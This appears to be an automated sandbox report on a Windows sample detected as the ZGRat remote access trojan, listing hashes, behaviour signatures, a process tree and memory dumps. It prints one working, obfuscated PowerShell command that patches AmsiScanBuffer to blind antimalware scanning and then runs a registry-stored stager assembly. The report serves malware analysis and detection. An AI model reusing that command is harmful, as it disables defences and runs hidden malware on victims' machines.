Analysis

  • max time kernel
    150s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-05-2024 23:09

General

  • Target

    cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe

  • Size

    4.5MB

  • MD5

    133fda00a490e613f3a6c511c1c660eb

  • SHA1

    e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

  • SHA256

    cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

  • SHA512

    f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

  • SSDEEP

    24576:ypPiRcjGOOiX3Sl9L7MupXdagdle6whTeo5A4T9W+xjaCsyfwUmvHX+ODvz8JQDm:

Score
10/10

Malware Config

Signatures

  • Detect ZGRat V1 34 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 9 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:336
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{95fecb1c-b05e-4496-9105-fc0c2e7115fd}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1776
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:684
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:956
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:740
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:868
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1128
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1136
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                  1⤵
                  • Drops file in System32 directory
                  PID:1160
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1168
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2868
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:BJxzvCKNTiFu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oLTzvnKhMKomeg,[Parameter(Position=1)][Type]$qAeviPEVRh)$fycpTzjqIVc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+'Me'+'m'+'o'+[Char](114)+'y'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'eT'+'y'+'pe','Clas'+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+'a'+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+'i'+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s,'+[Char](65)+''+'u'+'to'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$fycpTzjqIVc.DefineConstructor('R'+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+'l'+''+[Char](78)+'a'+[Char](109)+'e'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+','+''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$oLTzvnKhMKomeg).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+''+'a'+'n'+'a'+''+[Char](103)+'e'+[Char](100)+'');$fycpTzjqIVc.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+'P'+''+'u'+'b'+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+'y'+[Char](83)+''+'i'+'g,'+'N'+''+[Char](101)+''+[Char](119)+'S'+'l'+''+'o'+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$qAeviPEVRh,$oLTzvnKhMKomeg).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+''+'m'+'e'+','+''+[Char](77)+'a'+[Char](110)+''+'a'+'g'+[Char](101)+''+'d'+'');Write-Output $fycpTzjqIVc.CreateType();}$ZXBDlLCwYzaUm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+''+'e'+''+'m'+''+'.'+''+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+'W'+'i'+''+[Char](110)+''+'3'+''+[Char](50)+'.'+[Char](85)+''+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+'i'+'v'+[Char](101)+''+'M'+'e'+[Char](116)+''+'h'+'od'+[Char](115)+'');$xVOcOVKfXJlhwv=$ZXBDlLCwYzaUm.GetMethod('G'+'e'+'t'+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+'t'+''+'a'+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JVyBtotzgJLQqxClbRS=BJxzvCKNTiFu @([String])([IntPtr]);$nsJjUPbrOMWlSWLqcYfeaz=BJxzvCKNTiFu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VXlMTpPgIEk=$ZXBDlLCwYzaUm.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'ne'+[Char](108)+''+'3'+'2'+[Char](46)+''+'d'+'l'+'l'+'')));$tZHomIBJWQHxLy=$xVOcOVKfXJlhwv.Invoke($Null,@([Object]$VXlMTpPgIEk,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+'a'+''+'r'+''+[Char](121)+''+'A'+'')));$vwYKRkmdtbXXKgYce=$xVOcOVKfXJlhwv.Invoke($Null,@([Object]$VXlMTpPgIEk,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+'t')));$OhOXeoi=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tZHomIBJWQHxLy,$JVyBtotzgJLQqxClbRS).Invoke(''+'a'+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$muPOcdstKjJPxbYbP=$xVOcOVKfXJlhwv.Invoke($Null,@([Object]$OhOXeoi,[Object]('A'+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+'f'+'e'+''+'r'+'')));$rcBQNDMVWm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vwYKRkmdtbXXKgYce,$nsJjUPbrOMWlSWLqcYfeaz).Invoke($muPOcdstKjJPxbYbP,[uint32]8,4,[ref]$rcBQNDMVWm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$muPOcdstKjJPxbYbP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vwYKRkmdtbXXKgYce,$nsJjUPbrOMWlSWLqcYfeaz).Invoke($muPOcdstKjJPxbYbP,[uint32]8,0x20,[ref]$rcBQNDMVWm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'AR'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'s'+'t'+'a'+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:384
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1240
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1328
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1344
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1400
                            • C:\Windows\system32\sihost.exe
                              sihost.exe
                              2⤵
                                PID:2700
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:860
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:1096
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2508
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:2080
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2936
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                        1⤵
                                          PID:1436
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          1⤵
                                            PID:1572
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                            1⤵
                                              PID:1584
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                              1⤵
                                                PID:1680
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                1⤵
                                                  PID:1712
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                  1⤵
                                                    PID:1744
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                    1⤵
                                                      PID:1780
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1816
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1892
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                          1⤵
                                                            PID:1948
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                            1⤵
                                                              PID:1960
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                              1⤵
                                                                PID:1664
                                                              • C:\Windows\System32\spoolsv.exe
                                                                C:\Windows\System32\spoolsv.exe
                                                                1⤵
                                                                  PID:2060
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                  1⤵
                                                                    PID:2160
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                    1⤵
                                                                      PID:2172
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                      1⤵
                                                                        PID:2232
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                        1⤵
                                                                          PID:2516
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                          1⤵
                                                                            PID:2524
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2676
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                              1⤵
                                                                              • Drops file in System32 directory
                                                                              PID:2780
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                              1⤵
                                                                                PID:2808
                                                                              • C:\Windows\sysmon.exe
                                                                                C:\Windows\sysmon.exe
                                                                                1⤵
                                                                                  PID:2816
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                  1⤵
                                                                                    PID:2840
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                    1⤵
                                                                                      PID:2852
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                      1⤵
                                                                                        PID:2880
                                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3060
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          C:\Windows\Explorer.EXE
                                                                                          1⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3480
                                                                                          • C:\Users\Admin\AppData\Local\Temp\cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe"
                                                                                            2⤵
                                                                                            • Drops startup file
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4696
                                                                                            • C:\Users\Admin\AppData\Local\Temp\$77a324b5
                                                                                              "C:\Users\Admin\AppData\Local\Temp\$77a324b5"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3736
                                                                                            • C:\Users\Admin\AppData\Local\Temp\$7732c74a
                                                                                              "C:\Users\Admin\AppData\Local\Temp\$7732c74a"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2188
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                          1⤵
                                                                                            PID:3488
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                            1⤵
                                                                                              PID:3660
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:3860
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4016
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:3892
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:3816
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                      1⤵
                                                                                                        PID:3028
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                        1⤵
                                                                                                          PID:1552
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                          1⤵
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:1708
                                                                                                        • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                          "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                          1⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:2592
                                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:4360
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                            1⤵
                                                                                                              PID:4976
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                              1⤵
                                                                                                                PID:3580
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                1⤵
                                                                                                                  PID:1740
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:3640
                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:4412
                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                      C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                      1⤵
                                                                                                                        PID:2596

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Matrix

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\$77a324b5
                                                                                                                        Filesize

                                                                                                                        4.5MB

                                                                                                                        MD5

                                                                                                                        133fda00a490e613f3a6c511c1c660eb

                                                                                                                        SHA1

                                                                                                                        e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

                                                                                                                        SHA256

                                                                                                                        cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

                                                                                                                        SHA512

                                                                                                                        f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

                                                                                                                      • C:\Windows\Temp\__PSScriptPolicyTest_2ililuom.ckf.ps1
                                                                                                                        Filesize

                                                                                                                        60B

                                                                                                                        MD5

                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                        SHA1

                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                        SHA256

                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                        SHA512

                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                      • memory/384-4923-0x00007FFA73130000-0x00007FFA73BF1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        10.8MB

                                                                                                                      • memory/384-4899-0x00007FFA73133000-0x00007FFA73135000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/384-4900-0x00007FFA73130000-0x00007FFA73BF1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        10.8MB

                                                                                                                      • memory/384-4901-0x00007FFA73130000-0x00007FFA73BF1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        10.8MB

                                                                                                                      • memory/384-4902-0x0000027EA4220000-0x0000027EA4242000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        136KB

                                                                                                                      • memory/384-4912-0x00007FFA73130000-0x00007FFA73BF1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        10.8MB

                                                                                                                      • memory/384-4913-0x0000027EBC700000-0x0000027EBC72A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        168KB

                                                                                                                      • memory/384-4928-0x00007FFA73130000-0x00007FFA73BF1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        10.8MB

                                                                                                                      • memory/608-4944-0x00007FFA91C8D000-0x00007FFA91C8E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/608-4943-0x000001DF9D1B0000-0x000001DF9D1D5000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        148KB

                                                                                                                      • memory/684-4958-0x00007FFA91C8D000-0x00007FFA91C8E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/740-4998-0x0000028B47550000-0x0000028B47575000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        148KB

                                                                                                                      • memory/740-5706-0x0000028B47550000-0x0000028B47575000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        148KB

                                                                                                                      • memory/956-4983-0x000002E03B3D0000-0x000002E03B3F5000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        148KB

                                                                                                                      • memory/956-4984-0x00007FFA91C8C000-0x00007FFA91C8D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/956-5705-0x000002E03B3D0000-0x000002E03B3F5000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        148KB

                                                                                                                      • memory/3736-4898-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/4696-52-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-4889-0x0000000074A7E000-0x0000000074A7F000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4696-42-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-40-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-38-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-36-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-32-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-30-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-26-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-22-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-34-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-20-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-18-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-16-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-14-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-10-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-8-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-6-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-5-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-4885-0x0000000074A70000-0x0000000075220000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/4696-4887-0x0000000006D40000-0x0000000006DBE000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        504KB

                                                                                                                      • memory/4696-4886-0x0000000074A70000-0x0000000075220000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/4696-4888-0x00000000056B0000-0x00000000056FC000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        304KB

                                                                                                                      • memory/4696-44-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-4890-0x0000000074A70000-0x0000000075220000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/4696-46-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-48-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-50-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-0-0x0000000074A7E000-0x0000000074A7F000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4696-54-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-56-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-58-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-63-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-64-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

                                                                                                                      • memory/4696-68-0x00000000068C0000-0x0000000006AFA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.2MB

